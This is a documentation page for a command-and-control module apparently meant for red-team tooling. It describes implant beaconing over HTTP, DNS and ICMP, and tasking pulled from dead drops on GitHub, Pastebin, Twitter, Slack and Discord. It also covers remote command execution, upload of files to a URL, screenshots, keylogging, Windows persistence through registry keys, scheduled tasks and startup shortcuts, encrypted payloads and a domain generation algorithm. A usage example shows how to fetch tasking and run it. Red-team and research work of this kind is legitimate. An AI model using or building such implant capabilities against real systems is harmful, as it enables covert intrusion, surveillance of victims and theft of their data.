ilusm.dev

c2

Command & Control framework - configurable beaconing over HTTP, DNS, and ICMP; dead drop resolvers (GitHub, Pastebin, Twitter, Slack, Discord); command parsing and execution; AES-GCM payload encryption; domain generation; transport rotation.

Load with: use c2

What this module does

c2 implements a command-and-control beaconing library for red-team and security-research tooling. It provides configurable beacon objects that describe how to call back to an operator - with jitter, multiple transport protocols, and AES-GCM encrypted payloads. Dead drop resolvers let an implant retrieve tasking from public internet services (GitHub raw content, Pastebin, Twitter RSS, Slack, Discord) rather than a dedicated C2 server. A domain generation algorithm produces a deterministic sequence of fallback domains from a seed value.

Quick example

use c2

# Configure a beacon
cfg = c2bea(60, 0.2, "https://example.com", "http")
# interval=60s, ±20% jitter, HTTP callback

# Generate a beacon payload (base64 JSON)
payload = c2gen(cfg, "command output here")

# Check in
c2che(cfg, "whoami output")

# Fetch tasking from a GitHub dead drop
raw = c2git("operator", "tasking-repo", "cmds.txt", nil)
cmd = c2par(raw)
c2exe(cmd)

# Encrypt a payload
enc_data = c2enc("sensitive data", "my-secret-key")
plain = c2dec(enc_data, "my-secret-key")

# Generate 5 DGA domains with seed 42 for .com
domains = c2dga(42, 5, "com")

Functions

Beacon configuration

c2bea(interval_secs, jitter, callback_url, protocol)

Creates a beacon config. jitter is a float (e.g. 0.2 for ±20%). protocol is "http", "dns", or "icmp". Sets a Chrome-like User-Agent string and initialises last_beacon: 0.

Beacon generation

c2gen(config, cmd_result)

Builds a beacon payload. Applies jitter to the interval via det.mix. Constructs {id, ts, result, next}, JSON-encodes it, then Base64-encodes the result. The id is a SHA-256 hash of a random number (via cry.s25).

Callback protocols

c2htt(url, payload)

HTTP beacon. Randomly selects one of four URL paths (/api/v1/data, /cdn/update, /static/resource, /js/lib.js), appends a random version parameter, and POSTs the payload with a browser User-Agent and JSON accept header.

c2dns(domain, payload)

DNS beacon. Base32-encodes the payload, splits it into 63-character labels, joins with dots, and performs an A-record lookup for the resulting subdomain of domain.

c2icm(target_ip, payload)

ICMP beacon. Sends the payload via host native __c2_icmp_send.

Dead drop resolvers

c2git(user, repo, file, token)

Fetches raw content from raw.githubusercontent.com/{user}/{repo}/main/{file}. Returns trimmed content, or nil on error.

c2twi(username)

Fetches a Twitter/X RSS feed for a username. Returns the raw response body (for parsing encoded commands from tweet text), or nil on error.

c2pas(paste_id)

Fetches raw content from pastebin.com/raw/{paste_id}. Returns the content or nil.

c2sla(token, channel)

Reads messages from a Slack channel via host native __c2_slack_read.

c2dis(channel_id, bot_token)

Fetches recent messages from a Discord channel via the Discord API. Returns the raw response body, or nil.

Command parsing and execution

c2par(raw_cmd)

Parses a command string. If it starts with "C2:", strips the prefix, Base64-decodes, and JSON-decodes to get {cmd, args}. Otherwise returns {cmd: raw_cmd, args: []}.

c2exe(cmd_obj)

Executes a parsed command object. Supported commands:

  • "exec" - runs a process via proc.procr
  • "download" - fetches a URL and writes to a local path
  • "upload" - reads a file, Base64-encodes it, POSTs to a URL
  • "screenshot" - calls __c2_screenshot
  • "keylog" - starts keylogger for N seconds via keylog.keylo
  • "sleep" - sleeps N seconds via tim.timsl

Persistence

c2per is overloaded by context.

c2per(key_name, value)

Persists a registry key-value pair via __c2_persist_reg.

c2per(task_name, cmd)

Creates a scheduled task via __c2_persist_task.

c2per(lnk_name, target)

Creates a Windows startup shortcut (.lnk) in the current user's Startup folder via __c2_create_lnk.

Encryption

c2enc(payload, key)

Encrypts a payload with AES-GCM. Generates a 12-byte random nonce via cry.cryrn, seals with cry.crysl, then Base64-encodes nonce + ciphertext.

c2dec(enc_payload, key)

Decrypts a payload. Base64-decodes, splits the first 12 bytes as the nonce, decrypts the remainder with cry.cryop.

Domain generation and transport rotation

c2dga(seed, count, tld)

Domain generation algorithm. Seeds a deterministic RNG with seed + i for each domain. Generates names of length 10–15 from a-z0-9, then appends the TLD. Returns a list of count domain strings.

c2rot(urls, current_idx)

Returns the URL at current_idx and the next index (wrapping). Use to rotate through a list of C2 URLs.

Check-in

c2che(beacon_config, results)

Generates a beacon payload and sends it over the configured protocol ("http"c2htt, "dns"c2dns, "icmp"c2icm). Returns nil for unknown protocols.

Notes

  • This module is intended for authorised red-team operations and security research only.
  • Host natives required: __c2_icmp_send, __c2_slack_read, __c2_screenshot, __c2_persist_reg, __c2_persist_task, __c2_create_lnk.
  • Requires trl, txt, and cry.